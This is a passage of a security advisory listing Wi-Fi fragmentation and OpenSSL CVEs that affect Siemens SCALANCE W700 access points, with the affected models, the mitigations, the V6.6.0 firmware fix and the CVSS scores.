SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-26141 An issue was discovered in the ALFA Windows 10 driver 6.1316.1209 for AWUS036H. The Wi-Fi implementation does not verify the Message Integrity Check (authenticity) of fragmented TKIP frames. An adversary can abuse this to inject and possibly decrypt packets in WPA or WPA2 networks that support the TKIP data-confidentiality protocol. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-354 Improper Validation of Integrity Check Value Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-26143 An issue was discovered in the ALFA Windows 10 driver 1030.36.604 for AWUS036ACH. The WEP, WPA, WPA2, and WPA3 implementations accept fragmented plaintext frames in a protected Wi-Fi network. An adversary can abuse this to inject arbitrary data frames independent of the network configuration. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-26144 An issue was discovered on Samsung Galaxy S3 i9305 4.4.4 devices. The WEP, WPA, WPA2, and WPA3 implementations accept plaintext A-MSDU frames as long as the first 8 bytes correspond to a valid RFC1042 (i.e., LLC/SNAP) header for EAPOL. An adversary can abuse this to inject arbitrary network packets independent of the network configuration. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-26146 An issue was discovered on Samsung Galaxy S3 i9305 4.4.4 devices. The WPA, WPA2, and WPA3 implementations reassemble fragments with non-consecutive packet numbers. An adversary can abuse this to exfiltrate selected fragments. This vulnerability is exploitable when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. Note that WEP is vulnerable to this attack by design. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N CVE-2020-26147 An issue was discovered in the Linux kernel 5.8.9. The WEP, WPA, WPA2, and WPA3 implementations reassemble fragments even though some of them were sent in plaintext. This vulnerability can be abused to inject packets and/or exfiltrate selected fragments when another device sends fragmented frames and the WEP, CCMP, or GCMP data-confidentiality protocol is used. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Mitigation As these vulnerabilities can only be exploited within Wi-Fi range, when possible reduce Wi-Fi transmission power or make sure to have the devices in private areas with physical access controls Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.4 MEDIUM CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N CVE-2021-3712 ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y). View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE W778-1 M12 (6GK5778-1GY00-0AA0), SCALANCE W778-1 M12 (6GK5778-1GY00-0AB0), SCALANCE W778-1 M12 EEC (6GK5778-1GY00-0TA0), SCALANCE W778-1 M12 EEC (USA) (6GK5778-1GY00-0TB0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AA0), SCALANCE W786-1 RJ45 (6GK5786-1FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AA0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AB0), SCALANCE W786-2 RJ45 (6GK5786-2FC00-0AC0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AA0), SCALANCE W786-2 SFP (6GK5786-2FE00-0AB0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AA0), SCALANCE W786-2IA RJ45 (6GK5786-2HC00-0AB0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AA0), SCALANCE W788-1 M12 (6GK5788-1GD00-0AB0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AA0), SCALANCE W788-1 RJ45 (6GK5788-1FC00-0AB0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AA0), SCALANCE W788-2 M12 (6GK5788-2GD00-0AB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TA0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TB0), SCALANCE W788-2 M12 EEC (6GK5788-2GD00-0TC0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AA0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AB0), SCALANCE W788-2 RJ45 (6GK5788-2FC00-0AC0) Product Status: known_affected Remediations Vendor fix Update to V6.6.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109996102/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.4 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H CVE-2022-0778 The BN_mod_sqrt() function in openSSL, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. View CVE Details Affected Products Siemens SCALANCE Vendor: Siemens Product Version: SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AA0), SCALANCE W721-1 RJ45 (6GK5721-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AA0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AB0), SCALANCE W722-1 RJ45 (6GK5722-1FC00-0AC0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA0), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AA6), SCALANCE W734-1 RJ45 (6GK5734-1FX00-0AB0), SCALANCE W734-1 RJ45 (USA) (6GK5734-1FX00-0AB6), SCALANCE W738-1 M12 (6GK5738-1GY00-0AA0), SCALANCE W738-1 M12 (6GK5738-1GY00-0AB0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AA0), SCALANCE W748-1 M12 (6GK5748-1GD00-0AB0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AA0), SCALANCE W748-1 RJ45 (6GK5748-1FC00-0AB0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AA0), SCALANCE W761-1 RJ45 (6GK5761-1FC00-0AB0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TA0), SCALANCE W774-1 M12 EEC (6GK5774-1FY00-0TB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AA6), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AB0), SCALANCE W774-1 RJ45 (6GK5774-1FX00-0AC0), SCALANCE W774-1 RJ45 (USA) (6GK5774-1FX00-0AB6), SCALANCE 